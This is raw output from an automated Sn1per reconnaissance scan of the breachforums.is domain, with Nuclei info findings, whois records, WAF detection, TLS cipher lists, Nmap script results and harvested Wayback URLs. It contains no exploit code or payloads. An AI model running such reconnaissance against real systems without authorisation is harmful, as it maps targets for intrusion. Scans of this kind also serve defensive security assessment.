P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [noc@cloudflare.com,abuse@flokinet.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls12]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls13]                    
P5 - INFO, Robots.txt Detected,http://breachforums.is:80/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Robots.txt Detected,http://breachforums.is:8080/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Server Header Disclosure - HTTP, http://breachforums.is:8080//, Server: cloudflare
P5 - INFO, Robots.txt Detected,https://breachforums.is:443/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Server Header Disclosure - HTTPS, https://breachforums.is:443//, server: cloudflare
====================================================================================
====================================================================================•x[2023-09-17](21:12)x•
 SCAN COMPLETE! 
====================================================================================•x[2023-09-17](21:12)x•
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

[*] Opening loot directory /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
 + -- --=[ Generating reports...
[|||]
 + -- --=[ Sorting all files...
 + -- --=[ Removing blank screenshots and files...
 + -- --=[ Done!
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
[*] Checking for active internet connection [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[https://sn1persecurity.com
 + -- --=[Sn1per v9.2 by @xer0dayz                                                                                  
                                                                                                                    
                                                                                                                    
               ;               ,                                                                                    
             ,;                 '.                                                                                  
            ;:                   :;                                                                                 
           ::                     ::                                                                                
           ::                     ::                                                                                
           ':                     :                                                                                 
            :.                    :                                                                                 
         ;' ::                   ::  '                                                                              
        .'  ';                   ;'  '.                                                                             
       ::    :;                 ;:    ::                                                                            
       ;      :;.             ,;:     ::                                                                            
       :;      :;:           ,;"      ::                                                                            
       ::.      ':;  ..,.;  ;:'     ,.;:                                                                            
        "'"...   '::,::::: ;:   .;.;""'                                                                             
            '"""....;:::::;,;.;"""                                                                                  
        .:::.....'"':::::::'",...;::::;.                                                                            
       ;:' '""'"";.,;:::::;.'""""""  ':;                                                                            
      ::'         ;::;:::;::..         :;                                                                           
     ::         ,;:::::::::::;:..       ::                                                                          
     ;'     ,;;:;::::::::::::::;";..    ':.                                                                         
    ::     ;:"  ::::::"""'::::::  ":     ::                                                                         
     :.    ::   ::::::;  :::::::   :     ;                                                                          
      ;    ::   :::::::  :::::::   :    ;                                                                           
       '   ::   ::::::....:::::'  ,:   '                                                                            
        '  ::    :::::::::::::"   ::                                                                                
           ::     ':::::::::"'    ::                                                                                
           ':       """""""'      ::                                                                                
            ::                   ;:                                                                                 
            ':;                 ;:"                                                                                 
    -hrr-     ';              ,;'                                                                                   
                "'           '"                                                                                     
                  ''''                                                                                              

====================================================================================•x[2023-09-17](21:12)x•
 RUNNING TCP PORT SCAN 
====================================================================================•x[2023-09-17](21:12)x•
 + -- --=[Port 8443 opened... running tests...
====================================================================================•x[2023-09-17](21:12)x•
 CHECKING HTTP HEADERS AND METHODS 
====================================================================================•x[2023-09-17](21:12)x•
HTTP/2 521 
date: Mon, 18 Sep 2023 04:12:37 GMT
content-length: 0
cache-control: no-store, no-cache
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 8086c06f8c930d50-LAX

HTTP/2 521 
date: Mon, 18 Sep 2023 04:12:38 GMT
content-length: 0
cache-control: no-store, no-cache
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 8086c071df3d7c6e-LAX

====================================================================================•x[2023-09-17](21:12)x•
 GATHERING WEB FINGERPRINT 
====================================================================================•x[2023-09-17](21:12)x•
 Server: cloudflare
 CF-RAY: 8086c0778f592f71-LAX
====================================================================================•x[2023-09-17](21:12)x•
 DISPLAYING META GENERATOR TAGS 
====================================================================================•x[2023-09-17](21:12)x•
====================================================================================•x[2023-09-17](21:12)x•
 DISPLAYING COMMENTS 
====================================================================================•x[2023-09-17](21:12)x•
====================================================================================•x[2023-09-17](21:12)x•
 DISPLAYING SITE LINKS 
====================================================================================•x[2023-09-17](21:12)x•
====================================================================================•x[2023-09-17](21:12)x•
 CHECKING FOR WAF 
====================================================================================•x[2023-09-17](21:12)x•

                ______
               /      \                                                                                             
              (  W00f! )                                                                                            
               \  ____/                                                                                             
               ,,    __            404 Hack Not Found                                                               
           |`-.__   / /                      __     __                                                              
           /"  _/  /_/                       \ \   / /                                                              
          *===*    /                          \ \_/ /  405 Not Allowed                                              
         /     )__//                           \   /                                                                
    /|  /     /---`                        403 Forbidden                                                            
    \\/`   \ |                                 / _ \                                                                
    `\    /_\\_              502 Bad Gateway  / / \ \  500 Internal Error                                           
      `_____``-`                             /_/   \_\                                                              
                                                                                                                    
                        ~ WAFW00F : v2.2.0 ~                                                                        
        The Web Application Firewall Fingerprinting Toolkit                                                         
                                                                                                                    
[*] Checking https://breachforums.is
[+] The site https://breachforums.is is behind Cloudflare (Cloudflare Inc.) WAF.
[~] Number of requests: 2

====================================================================================•x[2023-09-17](21:12)x•
 GATHERING HTTP INFO 
====================================================================================•x[2023-09-17](21:12)x•
https://breachforums.is:8443 [521 Unassigned] Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare], IP[104.22.50.133], Script, Title[breachforums.is | 521: Web server is down], UncommonHeaders[referrer-policy,cf-ray], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=Edge]

====================================================================================•x[2023-09-17](21:12)x•
 GATHERING SSL/TLS INFO 
====================================================================================•x[2023-09-17](21:12)x•
Version: 2.1.0-static
OpenSSL 3.0.10 1 Aug 2023

Connected to 172.67.5.22

Testing SSL server breachforums.is on port 8443 using SNI name breachforums.is

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     disabled
TLSv1.0   enabled
TLSv1.1   enabled
TLSv1.2   enabled
TLSv1.3   enabled

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.3  128 bits  TLS_AES_128_GCM_SHA256        Curve 25519 DHE 253
Accepted  TLSv1.3  256 bits  TLS_AES_256_GCM_SHA384        Curve 25519 DHE 253
Accepted  TLSv1.3  256 bits  TLS_CHACHA20_POLY1305_SHA256  Curve 25519 DHE 253
Preferred TLSv1.2  256 bits  ECDHE-RSA-CHACHA20-POLY1305   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
Accepted  TLSv1.2  128 bits  AES128-SHA                   
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
Accepted  TLSv1.2  256 bits  AES256-SHA                   
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  AES128-SHA256                
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  AES256-SHA256                
Preferred TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.1  128 bits  AES128-SHA                   
Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.1  256 bits  AES256-SHA                   
Preferred TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.0  128 bits  AES128-SHA                   
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.0  256 bits  AES256-SHA                   
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 

  Server Key Exchange Group(s):
TLSv1.3  128 bits  secp256r1 (NIST P-256)
TLSv1.3  192 bits  secp384r1 (NIST P-384)
TLSv1.3  260 bits  secp521r1 (NIST P-521)
TLSv1.3  128 bits  x25519
TLSv1.2  128 bits  secp256r1 (NIST P-256)
TLSv1.2  192 bits  secp384r1 (NIST P-384)
TLSv1.2  260 bits  secp521r1 (NIST P-521)
TLSv1.2  128 bits  x25519

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  breachforums.is
Altnames: DNS:breachforums.is, DNS:*.breachforums.is
Issuer:   GTS CA 1P5

Not valid before: Jul 21 09:34:45 2023 GMT
Not valid after:  Oct 19 09:34:44 2023 GMT

====================================================================================•x[2023-09-17](21:12)x•
 CHECKING FOR INSECURE SSL/TLS CONFIGURATIONS 
====================================================================================•x[2023-09-17](21:12)x•
====================================================================================•x[2023-09-17](21:12)x•
 SAVING SCREENSHOTS 
====================================================================================•x[2023-09-17](21:12)x•
webscreenshot.py version 2.2.1

[+] 1 URLs to be screenshot
[+] 1 actual URLs screenshot
[+] 0 error(s)
====================================================================================•x[2023-09-17](21:12)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2023-09-17](21:12)x•
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 21:12 PDT
NSE: Loaded 51 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:12
Completed NSE at 21:12, 0.00s elapsed
Initiating NSE at 21:12
Completed NSE at 21:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:12
Completed Parallel DNS resolution of 1 host. at 21:12, 0.05s elapsed
Initiating SYN Stealth Scan at 21:12
Scanning breachforums.is (172.67.5.22) [1 port]
Discovered open port 8443/tcp on 172.67.5.22
Completed SYN Stealth Scan at 21:13, 0.08s elapsed (1 total ports)
Initiating Service scan at 21:13
Scanning 1 service on breachforums.is (172.67.5.22)
Completed Service scan at 21:13, 12.24s elapsed (1 service on 1 host)
NSE: Script scanning 172.67.5.22.
Initiating NSE at 21:13
Completed NSE at 21:13, 6.16s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.64s elapsed
Nmap scan report for breachforums.is (172.67.5.22)
Host is up (0.040s latency).
Other addresses for breachforums.is (not scanned): 104.22.51.133 104.22.50.133 2606:4700:10::6816:3285 2606:4700:10::6816:3385 2606:4700:10::ac43:516

PORT     STATE SERVICE  VERSION
8443/tcp open  ssl/http Cloudflare http proxy
| http-brute:   
|_  Path "/" does not require authentication
|_http-server-header: cloudflare

NSE: Script Post-scanning.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.53 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING PASSIVE WEB SPIDER 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 FETCHING WAYBACK MACHINE URLS 
====================================================================================•x[2023-09-17](21:13)x•
http://breachforums.is/
https://breachforums.is/.well-known/ai-plugin.json
https://breachforums.is/.well-known/assetlinks.json
https://breachforums.is/.well-known/dnt-policy.txt
https://breachforums.is/.well-known/gpc.json
https://breachforums.is/.well-known/nodeinfo
https://breachforums.is/.well-known/openid-configuration
https://breachforums.is/.well-known/security.txt
https://breachforums.is/.well-known/trust.txt
https://breachforums.is/?__cf_chl_tk=3WkbHpWJDB1ImnWz3hxOIxYQjFKmHksDosU7ECIyP5s-1692197194-0-gaNycGzNC1A
https://breachforums.is/ads.txt
https://breachforums.is/alerts.php?modal=1
https://breachforums.is/Announcement-Database-Index
https://breachforums.is/Announcement-Leak-Section-Rules
https://breachforums.is/Announcement-Marketplace-Section-Rules
https://breachforums.is/Announcement-Official-Forum-Middlemen-Services
https://breachforums.is/app-ads.txt
https://breachforums.is/attachment.php
https://breachforums.is/awards
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/bans
https://breachforums.is/cache/themes/theme1/latestposts.min.css
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/showthread.min.css
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/usercp.min.css
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/alerts.min.css
https://breachforums.is/cache/themes/theme3/alerts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/alerts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/all.min.min.css
https://breachforums.is/cache/themes/theme3/all.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/all.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/css3.min.css
https://breachforums.is/cache/themes/theme3/css3.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/css3.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/custom.min.css
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1690800105
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/ficons.min.css
https://breachforums.is/cache/themes/theme3/ficons.min.css?t=1687828213
https://breachforums.is/cache/themes/theme3/ficons.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/global.min.css
https://breachforums.is/cache/themes/theme3/global.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/global.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/hovercards.min.css
https://breachforums.is/cache/themes/theme3/hovercards.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/hovercards.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/lib.min.min.css
https://breachforums.is/cache/themes/theme3/lib.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/lib.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/mobile.min.css
https://breachforums.is/cache/themes/theme3/mobile.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/mobile.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/modcp.min.css
https://breachforums.is/cache/themes/theme3/modcp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/plugins.min.css
https://breachforums.is/cache/themes/theme3/plugins.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/plugins.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/roboto.min.css
https://breachforums.is/cache/themes/theme3/roboto.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/roboto.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/star_ratings.min.css
https://breachforums.is/cache/themes/theme3/star_ratings.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/star_ratings.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/thread_status.min.css
https://breachforums.is/cache/themes/theme3/thread_status.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/thread_status.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/thread_status.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/thread_status.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1694000093
https://breachforums.is/canary.txt
https://breachforums.is/captcha.php
https://breachforums.is/captcha.php?imagehash=141828baf01d56225b0847031cab8d6d
https://breachforums.is/captcha.php?imagehash=2b38fa3ce7c1c1f3a1c0646eafbd970e
https://breachforums.is/captcha.php?imagehash=3edb31000c97cf726b1af2b57d7aaf6d
https://breachforums.is/captcha.php?imagehash=6650b3d1ec76dd823a0511a098dd3973
https://breachforums.is/captcha.php?imagehash=707eda7bcdc60820459f43d311992ce7
https://breachforums.is/captcha.php?imagehash=84b8c70b6e79a9cf6e01ee400285af71
https://breachforums.is/captcha.php?imagehash=94acb4d016fbc50d9b1301071b3d5a4f
https://breachforums.is/captcha.php?imagehash=9899e4817991021a9df5353240f04a31
https://breachforums.is/captcha.php?imagehash=98ed3e32a3d89af41f63167d01363475
https://breachforums.is/captcha.php?imagehash=b82e9751ef7f715508fc061289a732ba
https://breachforums.is/captcha.php?imagehash=cd820b48f182e82db10f31ed3f84be13
https://breachforums.is/captcha.php?imagehash=d65f4f7c5ba0aa3bd33ed05939d87477
https://breachforums.is/captcha.php?imagehash=daaed679cfc9e862dd0f699b189af904
https://breachforums.is/captcha.php?imagehash=dc489491f6460807cbf5724a911a7a42
https://breachforums.is/captcha.php?imagehash=e066c4c96a2f109716855a7a78f7b19e
https://breachforums.is/captcha.php?imagehash=ece183a7ec0640c2d741988b3cfaa66f
https://breachforums.is/captcha.php?imagehash=ef41a4ca2b053f78a2be922c5b6eebd7
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1022172274:1694941561:DFezosWkrAAP6CsADgEQUS8STOXYsjDJogNI_286vRU/808076f57dfa15ba/9a866b27871b44b
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1158509571:1692195799:1nGud-MBuu7NKai0lD6K3Bk7ElZ7MGqDopRxR1Yqdq8/7f7a7a221e4c2364/82218ff13cd6eac
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1184811243:1693292907:R1ztbnaqBBeAYCzWUrfK55FceOedzuyJ050_wXl2ZKU/7fe352cb990afa86/999b49a6090634c
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1307438287:1692195792:xqdCEAflJhAadPHqS4pentED3jW_7Uj5DmG5KHasPpg/7f7a7a59ed77ce84/d393701f2bddf33
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1391597927:1692195859:iJQm692-ObfWbQKgSRi4Dex8R4T4cCrQMxvc79qTcVc/7f7a7a947c67cf31/9ac6d77b267941a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1396288796:1694794031:pEm_pqVF9U6XiPQhIvONa_kUvbhUHUn-QfPRNIJs-vY/80728ca05f785c18/a392d7d237a9c29
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1409471175:1694797680:iLr9JakE4BOLKHHsVcb9k-u2JXaQMs3HVESiQ6dIOIU/80729406fd8f1703/44c2270bd6a357f
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1431726166:1694797741:c7P9YNYEwE78L3OMW6mbmySMz_nJpHsa3rvG90vVxck/807290c26a79f9f1/8ffb7cf3854eb6a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1526924672:1692195816:TvoI2h-zTs0Wzu_M__TdabMUukcwjrF6lfT2pA_73lU/7f7a79246b85985a/6d4235938453e0d
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1531445855:1690700772:4GdzAZ0lz_JTHdxvaANy0ytMNVDl_-Ncq-iZuPGF-wc/7eebe371eb3824fa/8679a1accb6d2eb
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1592424889:1694797767:D8zm1wF6v27xTRoLM6-1irTBa5aLQXUD1fyorxBqXvw/8072956aff732393/c4bb3724039c42a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1606251257:1694797799:egQs7MdFFPJHomzgBvqZsmbMQIGmeZ5EPUF5RqqRc08/80728ea30ece24dc/15fe7f60e654a7b
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1611212363:1690157277:Ya_o143n6cMFNNLMExaJ3hlRmadyNAdhXTdfUsYalik/7eb823147fa9158f/10a70f7f4735591
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1720806833:1690700857:nWNCQhDzetyvy0aUBCK3ynelt50arVj4r8prMnyHQw8/7eebe2f87c44cedd/7c345247ff7b8c4
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1720806833:1690700857:nWNCQhDzetyvy0aUBCK3ynelt50arVj4r8prMnyHQw8/7eebe33849962512/bd7f041bbfefab1
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1768021021:1692195867:TgC_to9fAnrTiOvCcgoBKALEQsA_kRl_VLQuo9VFa8w/7f7a79033e55983a/98124283b0f751b
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1999398225:1690700735:b_DSlMycFu9ZxXYThaPD7mf3XHjOt_T44iIqWA5sC20/7eebe2c95dda1748/c4aa30e144363f7
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/216388804:1693292991:HCc38SRaUVXvWS5XGhQA9mLE5s3oNF0UUBcxP4mgG1Q/7fe3534a9e969644/4a367bc4ca2259a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/293236567:1693292934:uuPysJa-Vgo1UfIMHudjsAp_hiYwqq5nuz54Bowk6Ak/7fe352cc7dc9fa4e/a8c1cd6797ab939
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/324892410:1690700761:srCnJCkfWSLpP0Aqy0boyDVKPR35WfsZa8IsYG9B-nA/7eebe3d7ab619667/e713ed6f8d25d04
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/490982123:1690643359:mQFHYs0dUCsEg_LzVzptt2CnM5s-XJeQz1dfmO1JubM/7ee67e613ccacec1/577e56cbfc46764
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/534573019:1693026524:jGNRc_IxAUds-5lfT88_JSVhum1oONYlKlR9DqWU4-Y/7fc9a9595ad2159e/805c363111c4ab5
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/614259502:1693292965:7Atk7-xAIksTEuFpVfVtfDtNu-Ur086x2CYA8R3lcXM/7fe353496a76f93d/d241e909ac100d2
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/619123956:1690636137:Qq5rGO0FDW9Ras1gkh5IPe8yXFO4F8umh9orPvzKASU/7ee5b8440c22172a/62a26d56449664a
